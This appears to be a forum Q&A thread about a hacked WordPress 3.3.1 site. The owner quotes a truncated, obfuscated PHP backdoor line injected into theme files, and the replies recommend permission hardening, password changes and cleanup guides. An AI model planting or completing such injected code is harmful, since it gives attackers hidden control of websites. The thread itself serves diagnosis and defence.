# Wordpress hacked and php code added

Tags: wordpress, security

I got this code on an updated wordpress site.

Wordpress 3.3.1, and all plugins up to date.
Plugin list: custom-contact-forms, google-maps-for-wordpress & seo-ultimate.

Some theme files affected where CHMOD 644, Every time that I let a file with CHMOD 777 this start, but it will not affect only 777 files, it also affect 644 files.

The code is as follow:

```
<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioD............okBoVSjr = $eva1tYlbakBcVSir;} ?>
```

So, how can I prevent this, and what does the code do?

Comment: Well, I had no idea that it looks like a backdoor, Now I guess I will start to search on google about that. - Thanks

Any help to understand how to prevent this or to what the code does is appriciated

Comment: @Niklas Baumstark - You say "app" do you mean the wordpress files ?

Answer (score 6, accepted):

No Wordpress file should ever be 777; the maximum permissions are 755 folders, 644 files. See [Hardening WordPress « WordPress Codex.](http://codex.wordpress.org/Hardening_WordPress)

Your hosting account - probably inexpensive shared hosting - is probably the hack vector. Tell your host; possibly find a more secure host. Change all passwords. Scan your own PC.

To completely clean your WP install and hosting account, see [FAQ: My site was hacked « WordPress Codex](http://codex.wordpress.org/FAQ_My_site_was_hacked) and [How to completely clean your hacked wordpress installation](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/) and [How to find a backdoor in a hacked WordPress.](http://ottopress.com/2009/hacked-wordpress-backdoors/)

Comment: Hi, Thanks a lot, I just finish to re-install wordpress and all plugins. All secure now, the strange thing is that the hack only changes the status of the page, from 200ok to 500 and it really hurt on google. The site loads ok to the user, but if you take a look to the header responce you get a 500.
Any way, all fixed now I hope.

Comment: Thanks a lot! I followed the Hardening WordPress article and also found a blog listing additional tips on securing Wordpress, http://dmlogic.com/blog/alternative-thoughts-on-securing-wordpress/